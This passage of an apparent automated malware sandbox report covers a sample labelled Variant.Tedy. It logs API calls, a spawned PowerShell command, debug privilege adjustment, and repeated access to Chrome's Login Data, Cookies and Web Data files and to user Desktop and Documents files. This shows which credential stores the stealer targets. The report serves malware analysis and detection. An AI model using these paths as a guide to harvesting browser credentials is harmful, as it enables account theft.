                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768DA3170 memset,GetSystemInfo,0_2_00007FF768DA3170
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C67140 memset,FindFirstFileW,FindClose,CloseHandle,HeapFree,HeapFree,HeapFree,0_2_00007FF768C67140
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.271754980.000001C7F3880000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271121352.000001C7F387E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BAD0E0 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF768BAD0E0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768DB8110 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF768DB8110
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayNameJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B9E54E memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,WaitForSingleObject,GetLastError,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,AllocateAndInitializeSid,memcpy,memcpy,CloseHandle,CloseHandle,CloseHandle,memcpy,memcpy,0_2_00007FF768B9E54E
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BUFZSQPCOH.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BWDRWEEARI.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\DUKNXICOZT.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\Excel 2016.lnk VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\HMPPSXQPQV.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\HMPPSXQPQV.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\HMPPSXQPQV.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\HMPPSXQPQV.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\HQJBRDYKDE.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\IZMFBFKMEB.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\LHEPQPGEWF.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\LIJDSFKJZG.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\LIJDSFKJZG.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\Microsoft Edge.lnk VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\NIRMEKAMZH.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\NIRMEKAMZH.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\PWZOQIFCAN.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\PWZOQIFCAN.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\QFAPOWPAFG.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\QFAPOWPAFG.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\QFAPOWPAFG.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\QFAPOWPAFG.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\QFAPOWPAFG.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\VWDFPKGDUF.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\WHZAGPPPLA.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\Word 2016.lnk VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\WSHEJMDVQC.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\WSHEJMDVQC.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Desktop\WSHEJMDVQC.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\AQRFEVRTGL.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BUFZSQPCOH.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BWDRWEEARI.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BXAJUJAOEO.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BXAJUJAOEO.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BXAJUJAOEO.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\BXAJUJAOEO.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\DUKNXICOZT.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\HMPPSXQPQV.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\HMPPSXQPQV.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\HMPPSXQPQV.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\HMPPSXQPQV.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\HQJBRDYKDE.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\IZMFBFKMEB.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\LHEPQPGEWF.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\LIJDSFKJZG.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\LIJDSFKJZG.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\NIRMEKAMZH.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\NIRMEKAMZH.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\PWZOQIFCAN.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\PWZOQIFCAN.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\QFAPOWPAFG.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\QFAPOWPAFG.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\QFAPOWPAFG.pdf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\QFAPOWPAFG.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\QFAPOWPAFG.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\VWDFPKGDUF.jpg VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeQueries volume information: C:\Users\user\Documents\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
